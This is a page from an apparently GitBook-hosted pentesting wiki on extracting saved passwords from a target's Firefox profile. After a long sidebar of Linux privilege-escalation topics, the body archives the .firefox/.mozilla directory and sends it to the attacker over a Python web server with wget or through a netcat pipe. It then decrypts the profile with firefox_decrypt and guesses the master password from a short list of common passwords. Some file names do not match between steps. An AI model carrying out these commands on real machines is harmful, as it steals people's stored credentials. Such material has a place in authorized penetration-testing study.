Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Mozilla Pentesting

PreviousLinux Privilege EscalationNextOpenSSL Privilege Escalation

Last updated 1 year ago

  • Zip

    First, zip .firefox directory in target machine, and open web server to transfer the zip file to local machine.

    zip -r /tmp/firefox.zip .firefox
cd /tmp
python3 -m http.server 8000
Copied!

    In local machine, download the zip file from the remote machine, and decompress it.

    wget http://<target-ip>:8000/mozilla.zip
unzip mozilla.zip
Copied!

  • Tar

    If we cannot use zip, tar also can be used. In local machine, start listener for getting the archived directory. "out.tar" will be created when the remote machine will send the compressed directory.

    nc -lvnp 1234 > out.tar
Copied!

    In remote machine, compress the directory and transfer over netcat.

    tar -cf - mozilla/ | nc <local-ip> 1234
Copied!

    Then, decompress it in local.

    tar -xf mozilla.tar
Copied!
python3 firefox_decrypt.py .mozilla/firefox/<id>.default-release
Copied!

If we’ll be asked the master password and we don’t know it, try common passwords.

admin
password
password1
password123
root

To crack the profile of Firefox, use .

Extract Passwords from Firefox Profile
1. Transfer the .firefox Directory
2. Decrypt the Password
firefox_decrypt
Page cover image